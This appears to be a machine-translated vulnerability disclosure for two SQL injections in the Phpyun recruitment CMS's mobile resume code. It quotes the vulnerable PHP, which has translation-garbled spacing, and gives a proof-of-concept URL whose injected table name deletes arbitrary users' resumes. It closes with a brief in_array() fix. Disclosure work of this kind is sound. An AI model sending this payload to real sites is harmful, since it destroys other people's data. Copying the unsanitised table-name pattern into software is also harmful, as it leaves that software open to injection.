Phpyun talent department () 2 SQL injections (any resume can be deleted)

Phpyun talent department () 2 SQL injections (any resume can be deleted)

Phpyun talent department () 2 SQL injections (any resume can be deleted)
Attackers cannot bypass waf and obtain sensitive information.

Code

/Wap/member/model/index. class. php
 

Function addresume_action () // The replication duration can be skipped. {If ($ this-> config ['user _ enforce_identitycert '] = "1") {$ row = $ this-> obj-> DB_select_once ("resume ", "'idcard _ pic '<>'' and 'uid' = '". $ this-> uid. "'"); if ($ row ['idcard _ status']! = "1") {$ data ['msg '] =' log on to the client to complete authentication! '; $ Data ['url'] = 'index. php ';}} if ($ _ GET ['type'] & intval ($ _ GET ['id']) {$ nid = $ this-> obj-> DB_delete_all ("resume _". $ _ GET ['type'], "'eid' = '". (int) $ _ GET ['eid']. "'and 'id' = '". (int) $ _ GET ['id']. "'and 'uid' = '". $ this-> uid. "'"); if ($ nid) {$ url = $ _ GET ['type']; $ this-> obj-> DB_update_all ("user_resume ", "'$ url' =' $ url'-1", "'eid' = '". (int) $ _ GET ['eid']. "'and 'uid' = '". $ this-> uid. "'"); $ resume_row = $ this-> obj-> DB_select_once (" User_resume "," 'eid' = '". (int) $ _ GET ['eid']. "'"); $ this-> obj-> complete ($ resume_row); $ data ['msg'] = 'deleted successfully! ';} Else {$ data ['msg'] = 'deletion failed! ';} $ Data ['url'] = 'index. php? C = addresume & eid = '. (int) $ _ GET ['eid'];} if ($ _ POST ['submit ']) {$ _ POST = $ this-> post_trim_iconv ($ _ POST ); if ($ _ POST ['eid']> 0) {$ table = "resume _". $ _ POST ['table']; $ id = (int) $ _ POST ['id']; $ url = $ _ POST ['table']; unset ($ _ POST ['submit ']); unset ($ _ POST ['table']); unset ($ _ POST ['id']); if ($ _ POST ['syear ']) {$ _ POST ['sdate'] = strtotime ($ _ POST ['syear']. "-". $ _ POST ['smou']. "-". $ _ POST ['sday']); $ _ POST ['update'] = strtotime ($ _ POST ['eyear' ']. "-". $ _ POST ['emouth ']. "-". $ _ POST ['eday']); unset ($ _ POST ['syear ']); unset ($ _ POST ['smouth']); unset ($ _ POST ['sday']); unset ($ _ POST ['eyear']); unset ($ _ POST ['emouth ']); unset ($ _ POST ['eday']);} if ($ id) {$ where ['id'] = $ id; $ where ['uid'] = $ this-> uid; $ nid = $ this-> obj-> update_once ($ table, $ _ POST, $ where );} else {$ _ POST ['uid'] = $ this-> uid; $ nid = $ this-> obj-> insert_into ($ table, $ _ POST ); $ this-> obj-> DB_update_all ("user_resume "," '$ Url' =' $ url' + 1 "," 'eid' = '". (int) $ _ POST ['eid']. "'and 'uid' = '". $ this-> uid. "'"); $ resume_row = $ this-> obj-> DB_select_once ("user_resume", "'eid' = '". (int) $ _ POST ['eid']. "'"); $ this-> obj-> complete ($ resume_row);} $ nid? $ Data ['msg '] =' saved successfully! ': $ Data ['msg'] = 'failed to save! '; $ Data ['url'] = $ nid? ('Index. php? C = addresume & eid = '. (int) $ _ POST ['eid']): ''; $ data ['msg '] = iconv ('gbk', 'utf-8 ', $ data ['msg ']); echo json_encode ($ data); die;} else {if ($ _ POST ['name'] = "") {$ data ['msg '] =' name cannot be blank! ';} Else if ($ _ POST ['sex'] = "") {$ data ['msg'] = 'gender cannot be blank! ';} Else if ($ this-> config ['user _ idcard'] = "1" & trim ($ _ POST ['idcard ']) = "") {$ data ['msg '] = 'id card number cannot be blank! ';} Else if ($ _ POST ['living'] = "") {$ data ['msg'] = 'current residence cannot be blank! ';} Else {unset ($ _ POST ['submit']); $ this-> obj-> delfiledir (".. /upload/tel /". $ this-> uid); $ where ['uid'] = $ this-> uid; $ nid = $ this-> obj-> update_once ("resume ", $ _ POST, $ where); if ($ nid) {$ this-> obj-> update_once ("member ", array ('email '= >$ _ POST ['email'], 'moblil' = >$ _ POST ['telphone']), $ where ); $ this-> obj-> member_log ("Save basic information"); $ data ['msg '] =' saved successfully! '; $ Data ['url'] = 'index. php? C = addresume ';} else {$ data ['msg'] = 'failed to save! '; $ Data ['url'] = 'index. php? C = addresume ';}}} if (! $ _ GET ['eid'] & $ _ POST ['submit '] = '') {$ num = $ this-> obj-> DB_select_once (" member_statis ", "'uid' = '". $ this-> uid. "'"); $ maxnum = $ this-> config ['user _ number']-$ num ['resume _ num']; $ confignum = $ this-> config ['user _ number']; if ($ maxnum <= 0 & $ confignum! = "") {$ Data ['msg '] =' your resume count has exceeded the number of resumes set by the system! '; $ Data ['url'] = 'index. php? C = resume ';} else if ($ _ GET ['eid']) {$ row = $ this-> obj-> DB_select_once ("resume_effecct ", "'id' = '". (int) $ _ GET ['eid']. "'and 'uid' = '". $ this-> uid. "'"); include (PLUS_PATH. "job. cache. php "); $ job_classid = @ explode (", ", $ row ['job _ classid ']); foreach ($ job_classid as $ v) {$ jobname [] = $ job_name [$ v];} $ jobname = @ implode (",", $ jobname); $ this-> yunset ("row ", $ row); $ this-> yunset ("jobname", $ jobname); $ skill = $ this-> obj-> DB_select_all ("resume_skill ", "'eid' = '". (int) $ _ GET ['eid']. "'and 'uid' = '". $ this-> uid. "'"); $ work = $ this-> obj-> DB_select_all ("resume_work", "'eid' = '". (int) $ _ GET ['eid']. "'and 'uid' = '". $ this-> uid. "'"); $ project = $ this-> obj-> DB_select_all ("resume_project", "'eid' = '". (int) $ _ GET ['eid']. "'and 'uid' = '". $ this-> uid. "'"); $ edu = $ this-> obj-> DB_select_all ("resume_edu", "'eid' = '". (int) $ _ GET ['eid']. "'and 'uid' = '". $ this-> uid. "'"); $ training = $ this-> obj-> DB_select_all ("resume_training", "'eid' = '". (int) $ _ GET ['eid']. "'and 'uid' = '". $ this-> uid. "'"); $ cert = $ this-> obj-> DB_select_all ("resume_cert", "'eid' = '". (int) $ _ GET ['eid']. "'and 'uid' = '". $ this-> uid. "'"); $ other = $ this-> obj-> DB_select_all ("resume_other", "'eid' = '". (int) $ _ GET ['eid']. "'and 'uid' = '". $ this-> uid. "'"); $ this-> yunset ("skill", $ skill); $ this-> yunset ("work", $ work ); $ this-> yunset ("project", $ project); $ this-> yunset ("edu", $ edu); $ this-> yunset ("training ", $ training); $ this-> yunset ("cert", $ cert); $ this-> yunset ("other", $ other );} $ resume = $ this-> obj-> DB_select_once ("resume", "'uid' = '". $ this-> uid. "'"); $ this-> yunset ("resume", $ resume); $ this-> yunset ("layer", $ data ); $ CacheArr ['user'] = array ('userdata', 'userclass _ name'); $ CacheArr ['job'] = array ('job _ Index ', 'Job _ type', 'job _ name'); $ CacheArr ['city'] = array ('city _ Index', 'city _ type ', 'city _ name'); $ CacheArr ['industry '] = array ('industry _ Index', 'industry _ name '); $ CacheArr = $ this-> CacheInclude ($ CacheArr); $ this-> waptpl ('sumsume ');}

Here we can see.
 

$nid=$this->obj->DB_delete_all("resume_".$_GET['type'],"`eid`='".(int)$_GET['eid']."' and `id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'");

Here $ _ GET ['type'] is directly imported into the database.

We can perform injection.



In addition, the content below this function
 

$ Table = "resume _". $ _ POST ['table']; // key ,..... $ Id = (int) $ _ POST ['id']; $ url = $ _ POST ['table']; unset ($ _ POST ['submit ']); unset ($ _ POST ['table']); unset ($ _ POST ['id']); if ($ _ POST ['syear ']) {$ _ POST ['sdate'] = strtotime ($ _ POST ['syear ']. "-". $ _ POST ['smou']. "-". $ _ POST ['sday']); $ _ POST ['edate'] = strtotime ($ _ POST ['eyear']. "-". $ _ POST ['emouth ']. "-". $ _ POST ['eday']); unset ($ _ POST ['syear ']); unset ($ _ POST ['smouth']); unset ($ _ POST ['sday']); unset ($ _ POST ['eyear']); unset ($ _ POST ['emouth ']); unset ($ _ POST ['eday']);} if ($ id) {$ where ['id'] = $ id; $ where ['uid'] = $ this-> uid; $ nid = $ this-> obj-> update_once ($ table, $ _ POST, $ where );

Similarly, the following function is used.
 

Function addresumeson_action () {if ($ _ GET ['id']) {$ row = $ this-> obj-> DB_select_once ("resume _". $ _ GET ['type'], "'id' = '". (int) $ _ GET ['id']. "'and 'uid' = '". $ this-> uid. "'"); // key ..... $ This-> yunset ("row", $ row) ;}$ this-> user_cache (); $ this-> waptpl ('sumsumeson ');}

How to delete any resume.

The Resume Information in the library is as follows:
 

Let's construct the type = direction CT 'where id = 3 #

Url
 

http://localhost/phpyun/wap/member/index.php?c=addresume&id=1&type=expect%60%20where%20id%3D3%23

 

 

 

Solution:

Add an in_array ()